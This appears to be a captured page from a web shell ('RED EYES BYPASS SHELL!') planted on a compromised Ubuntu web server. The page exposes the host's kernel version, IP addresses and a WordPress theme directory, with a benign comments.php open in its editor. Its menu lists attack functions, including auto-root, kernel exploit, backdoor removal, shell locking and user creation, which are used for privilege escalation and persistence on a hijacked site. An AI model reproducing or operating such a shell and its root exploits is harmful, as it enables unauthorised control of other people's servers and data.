Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
rufous /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
404.php
103
B
-rwxr-xr-x
LICENSE
34.33
KB
-rwxr-xr-x
comments.php
1.35
KB
-rwxr-xr-x
footer.php
119
B
-rwxr-xr-x
functions.php
11.98
KB
-rwxr-xr-x
header.php
449
B
-rwxr-xr-x
index.php
78
B
-rwxr-xr-x
page.php
96
B
-rwxr-xr-x
readme.txt
12.1
KB
-rwxr-xr-x
screenshot.jpg
92.49
KB
-rwxr-xr-x
single.php
95
B
-rwxr-xr-x
style.css
404.25
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php if ( post_password_required() ) : return; endif; global $kubio_comments_data; ?> <div id="comments" class="post-comments"> <h4 class="comments-title"> <span class="comments-number"> <?php comments_number( __( 'No Responses', 'rufous' ), __( 'One Response', 'rufous' ), __( '% Responses', 'rufous' ) ); ?> </span> </h4> <ol class="comment-list"> <?php wp_list_comments( array( 'avatar_size' => '40', 'format' => 'html5', ) ); ?> </ol> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : ?> <div class="h-row"> <div class="h-col h-col-auto"> <div class="prev-posts"> <?php previous_comments_link( sprintf( '« %s', __( 'Older Comments', 'rufous' ) ) ); ?> </div> </div> <div class="h-col"></div> <div class="h-col h-col-auto"> <div class="next-posts"> <?php next_comments_link( sprintf( '%s »', __( 'Newer Comments', 'rufous' ) ) ); ?> </div> </div> </div> <?php endif; ?> <?php if ( ! comments_open() && get_comments_number() && post_type_supports( get_post_type(), 'comments' ) ) : ?> <p class="no-comments"><?php _e( 'Comments are closed.', 'rufous' ); ?></p> <?php endif; ?> </div>
Close